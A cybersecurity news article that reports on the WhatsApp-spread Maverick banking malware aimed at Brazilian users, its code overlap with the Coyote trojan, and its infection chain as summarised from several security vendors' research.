Threat hunters have seen parallels between a recently revealed harmful program called Maverick that has spread via WhatsApp and a banking trojan known as Coyote.
Both malware variants are built in.NET, target Brazilian banks and users, and have the same ability to decrypt, target banking URLs, and monitor banking applications, according to a CyberProof investigation. More significantly, both have the capacity to propagate via WhatsApp Web.
Trend Micro initially reported Maverick early last month, linking it to a threat actor known as Water Saci. There are two parts to the campaign: SORVEPOTEL is a self-propagating malware that spreads using WhatsApp’s desktop browser version and delivers a ZIP archive that contains the Maverick payload.
The malware’s purpose is to keep an eye on open browser tabs for URLs that correspond to a hard-coded list of Latin American financial institutions. If the URLs match, it connects to a distant server to retrieve more orders to collect system data and deliver phishing sites to obtain login credentials.
In a later investigation, cybersecurity company Sophos was the first to question whether Maverick is a development of Coyote and whether the behavior might be connected to previously documented operations that spread Coyote to users in Brazil.
Maverick and Coyote did share a lot of code, according to another Kaspersky investigation, but it is being treated as a brand-new threat that targets Brazil collectively.
According to CyberProof’s most recent research, the ZIP package includes a Windows shortcut (LNK) that, when the user launches it, launches PowerShell or cmd.exe to connect to an external server (“zapgrande[.]com”) and download the first-stage payload.
The PowerShell script can fetch a.NET loader and initiate intermediate tools intended to disable Microsoft Defender Antivirus and UAC.
For its part, the loader uses anti-analysis methods to detect the existence of reverse engineering tools and, if they are discovered, self-terminate. The attack’s primary modules, SORVEPOTEL and Maverick, are subsequently downloaded by the loader.
It’s important to note that Maverick is only installed after confirming that the victim is in Brazil by examining the infected host’s time zone, language, region, date, and time format.
Additionally, CyberProof reported that it discovered indications of the virus being used to target specific hotels in Brazil, suggesting a potential increase of targeting.
